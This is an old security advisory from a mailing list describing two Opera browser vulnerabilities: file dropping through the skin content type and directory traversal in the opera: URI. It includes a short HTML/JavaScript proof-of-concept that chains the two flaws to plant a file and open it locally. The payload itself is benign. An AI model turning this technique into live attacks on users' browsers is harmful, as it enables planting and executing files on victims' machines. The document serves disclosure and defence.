Opera Skinned & Opera Directory Traversal (Additional Details & a Simple Exploit)
__________________________________
Do you Yahoo!?
Protect your identity with Yahoo! Mail AddressGuard
http://antispam.yahoo.com/whatsnewfree
Opera Skinned & Opera Directory Traversal (Additional Details & a Simple
Exploit):
==================================================================================
ADDITIONAL DETAILS:
While installing Opera, if the "USE SEPARATE SETTINGS FOR EACH USER" option is
selected, the "opera7/profile" folder is stored in the "<username>/application
data/opera7" location instead of in the Opera root folder. The "profile" folder
contains user specific data for different Opera users. Therefore, each user has
a different "profile" folder in his "<username>/application data/opera7" folder.
Folders of interest to us in which configuration files are automatically
downloaded and stored(like skin, toolbar, mouse, etc.) are subfolders of the
"profile" folder and hence are also moved to this location.
In this scenario, the arbitrary files can still be dropped in the respective
folders. However, for executing the files, the <username> variable must be
known. Other methods of exploiting this scenario may come up later.
SIMPLE PoC EXPLOIT:
This is a simple PoC for the two Opera vulnerabilities detailed in the "Opera
Skinned : Arbitrary File Dropping And Execution" and "Opera Web Browser
Directory Traversal in Internal URI Protocol" advisories.
"main.htm" is the file which is to be loaded into the browser remotely. This
file opens "skin.htm" in a new window. The Content-Type of "skin.htm" should be
set as "application/x-opera-skin" on the server. When skin.htm is opened in
this way, it is dropped in the "<opera dir>/profile/skin/" folder on the
victim's machine. This demonstrates the first vulnerability.
After dropping skin.htm, main.htm is redirected to the local skin.htm. The path
of skin.htm is calculated using the second vulnerability. This demonstrates the
second vulnerability.
NOTE: Dont forget to set the Content-Type as "application/x-opera-skin" for
skin.htm.
---------------START MAIN.HTM----------------
<html>
<head>
<script language="javascript">
var win=open("skin.htm") // The server should return
content-type as // "application/x-opera-skin" for "Skin.htm". "Skin.htm" will
be dropped in the "<opera // dir>/profile/skin/" folder.
setTimeout("redir()",2000) //modify according to your situation.
function redir(){
window.location.href="opera:/help/..%5c/profile/skin/skin.htm"
//This uses the // directory traversal flaw mentioned in advisory 2 to get the
path of the dropped file. In this // case, it is skin.htm.
}
</script>
</head>
<body>
<h1>This is the main file</h1>
</body>
</html>
---------------END MAIN.HTM----------------
---------------START SKIN.HTM----------------
<body>
<h1> Opera Skinned!!! </h1><p>This is Skin.htm from "<opera
dir>/profile/skin/" in localhost.
</body>
---------------END SKIN.HTM----------------
--
S.G.Masood
sgmasood@xxxxxxxxx
Hyderabad,
India.
DISCLAIMER:
This advisory is meant only for the dissemination of information, alerting the
general public about a security issue. Use this information at your own
discretion.
In brief, the author is not responsible for any use, misuse, abuse of this
information. Also, this information is provided "as is" without any warranty of
any kind.